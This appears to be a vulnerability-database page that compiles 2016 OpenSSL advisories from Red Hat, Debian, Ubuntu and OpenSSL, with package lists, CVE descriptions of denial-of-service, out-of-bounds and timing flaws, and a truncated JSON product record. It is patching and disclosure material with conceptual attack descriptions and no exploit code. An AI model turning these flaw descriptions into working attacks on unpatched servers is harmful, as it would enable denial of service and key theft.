Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
This release adds the new Apache HTTP Server 2.4.29 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes, enhancements and component upgrades included in this release. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7
-
OpenSSL Security Advisory [22 Sep 2016]
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
Severity: High
A malicious client can send an excessively large OCSP Status Request extension. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. This will eventually lead to a Denial Of Service attack through memory exhaustion. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0595", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "5" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "icewall mcrp", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "3.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "icewall sso", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "icewall federation agent", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "3.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" 